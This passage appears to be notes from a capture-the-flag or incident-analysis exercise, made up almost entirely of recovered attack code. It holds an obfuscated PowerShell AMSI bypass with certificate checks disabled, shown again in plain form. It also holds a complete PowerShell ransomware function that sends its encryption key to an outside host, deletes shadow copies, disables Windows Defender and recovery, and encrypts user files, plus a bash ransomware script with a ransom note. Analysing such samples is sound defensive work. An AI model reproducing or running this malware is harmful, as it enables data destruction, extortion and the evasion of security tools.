'91W78&101T116&46&83T101:114x118T105T99:101r80:111r105x110-116:77&97&110-97{103H101W114W93T58-58W83:101r114T118W101W114T67{101x114W116{105:102T105r99&97:116x101x86x97T108{105:100H97r116T105x111x110x67H97H108x108&98:97H99T107x32-61T32:123:36-116W114r117r101W125&10{116T114H121-123:10{91&82x101:102T93:46&65H115&115:101T109&98H108W121{46H71x101-116r84T121W112-101x40x39T83-121H115:39r43T39{116-101{109H46x77-97&110:39{43T39:97-103{101T109:101{110T116{46:65W117W116T39{43x39&111-109r97W116-105&111-110-46x65T109x39-43:39x115x105r85T116H39H43:39x105x108&115{39H41-46W71T101H116&70r105{101r108:100T40-39x97{109T39-43T39W115x105W73x110W105&39T43&39{116x70r97H105x108x101H100{39H44&32W39r78{111x110&80x39x43W39H117H98x108-105H99{44T83x116x97x39:43T39x116r105r99W39x41x46x83H101W116H86{97-108:117x101r40H36:110&117x108W108x44T32W36:116T114&117&101H41x10T125-99:97&116T99T104W123-125T10{114x101-115W116T97H114{116W45&99r111H109&112x117:116H101x114:32x45x102' -SPLIT'x' -Split'x' -spLIT 'r'-sPlIt'W' -SplIt '-' -sPlIT'T' -SpLit':'-SPlit '{'-splIT'H' -SPlit '&' | fOrEACh { ([CHaR][inT]$_)}) ) ``` ```powershell [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} restart-computer -f ``` Logging evasion: ```powershell [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try { [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) } catch {} restart-computer -f ``` --- 10.7.239.6 ```powershell function Ransom { Param( [Parameter(Position = 0)] [String] $IP='127.0.0.1' ) $aesManaged=new-object "System.Security.Cryptography.AesManaged"; $aesManaged.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aesManaged.Padding=[System.Security.Cryptography.PaddingMode]::Zeros; $aesManaged.BlockSize=128; $aesManaged.KeySize=256; $aesManaged.GenerateKey(); $IV = [System.Convert]::ToBase64String($aesManaged.IV); $key = [System.Convert]::ToBase64String($aesManaged.Key); $URL="http://$IP/key=$Key&iv=$IV&pc=$env:computername"; try { Invoke-WebRequest $URL } catch { $_.Exception.Response.StatusCode.Value__} $background = "http://$IP/wall.jpg" Invoke-WebRequest -Uri $background -OutFile "/users/$env:USERNAME/wall.jpg" Start-Sleep -s 2 $wallpaper = "C:/users/$env:USERNAME/wall.jpg" Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name Wallpaper -value "$wallpaper" Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -value "10" Start-Sleep -s 2 rundll32.exe user32.dll, UpdatePerUserSystemParameters, 1 , $False vssadmin delete shadows /all /quiet; spsv vss -ErrorAction SilentlyContinue; if(((gwmi -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode) -ne "Disabled"){ set-service vss -StartupType Disabled}; bcdedit /set recoveryenabled No|Out-Null; bcdedit /set bootstatuspolicy ignoreallfailures|Out-Null; spsv Wscsvc -ErrorAction SilentlyContinue; if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wscsvc'").StartMode) -ne "Disabled"){ set-service Wscsvc -StartupType Disabled}; spsv WinDefend -ErrorAction SilentlyContinue; if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WinDefend'").StartMode) -ne "Disabled"){ set-service WinDefend -StartupType Disabled}; spsv Wuauserv -ErrorAction SilentlyContinue; if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wuauserv'").StartMode) -ne "Disabled"){ set-service Wuauserv -StartupType Disabled}; spsv BITS -ErrorAction SilentlyContinue; if(((gwmi -Query "Select StartMode From Win32_Service Where Name='BITS'").StartMode) -ne "Disabled"){ set-service BITS -StartupType Disabled}; spsv ERSvc -ErrorAction SilentlyContinue; spsv WerSvc -ErrorAction SilentlyContinue; if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WerSvc'").StartMode) -ne "Disabled"){ set-service WerSvc -StartupType Disabled}; Write-Output "Encryption phase" $encryptor=$aesManaged.CreateEncryptor(); $directory = "C:\Share" $files=gci $directory -Recurse -Include *.txt,*.pdf,*.docx,*.doc,*.jpg; foreach($file in $files) { $bytes=[System.IO.File]::ReadAllBytes($($file.FullName)); $encryptedData=$encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); [byte[]] $fullData=$aesManaged.IV + $encryptedData; [System.IO.File]::WriteAllBytes($($file.FullName+".crpt"),$fullData); Remove-Item $file; } } ``` /key=SSxL4Qg//ErUxRqy25q4h4QVKWl8x5DxjvSVl+1fEsQ=&iv=1h9JnoT0PqRzvp2fbWYNnw==&pc=OIK-CLIENT Decrypted FLAG: ``` Ex minimis seminibus nascuntur ingentia. ``` --- ```bash= #!/bin/bash iv=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 32` pass=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 10` dirwalk=/var/www/html files=`find $dirwalk -maxdepth 1 -type f | grep -P ".php$|FLAG.txt$"` for f in $files do outfile=$f.encr openssl enc -aes-256-cbc -a -salt -in $f -out $outfile -pass pass:$pass -iv $iv rm $f done echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." | wall echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." > /etc/motd exit 0 ```